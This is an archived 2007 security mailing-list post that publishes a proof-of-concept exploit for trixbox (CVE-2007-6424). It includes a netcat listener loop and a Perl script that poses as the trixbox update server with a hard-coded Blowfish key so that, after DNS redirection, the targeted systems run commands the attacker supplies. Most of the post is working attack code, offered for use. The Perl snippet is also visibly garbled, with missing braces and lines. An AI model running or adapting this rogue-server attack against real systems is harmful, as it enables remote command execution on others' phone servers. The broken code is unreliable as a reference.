[VOIPSEC] trixbox vuln (CVE-2007-6424) - PoC exploit code
thanrantaro at live.com
Tue Dec 18 22:25:46 EST 2007
Since Fonality has been incredibly slow in dealing with this (it was
reported publicly on Saturday, and they don't expect to have a fix
until at least Friday), I decided to take it upon myself to get a CVE,
write some exploit code. I feel that 72+ hours is more than enough
time to fix something this simple. They also do not appear to have any
intentions of posting an advisory.
Run this in a simple script such as `while :; do netcat -l -p 80 -c
"perl trixbox-exploit.pl"; done`, and then a trivial DNS redirection
can take it from there.
trixbox:~$ cat trixbox-exploit.pl
my $cipher = Crypt::CBC->new( -cipher => "Blowfish", -key => "00000000000000000000000000000000" );
my $req = <STDIN>;
if( $req =~ /ce00000000000000000000000000000000/ )
$hax = $cipher->encrypt( "1\nce00000000000000000000000000000000\necho Exploited" );
elsif( $req =~ /generate_id/ )
$hax = "ce00000000000000000000000000000000\n00000000000000000000000000000000";
$hax = "ERROR: invalid server id";
Share life as it happens with the new Windows Live.
More information about the Voipsec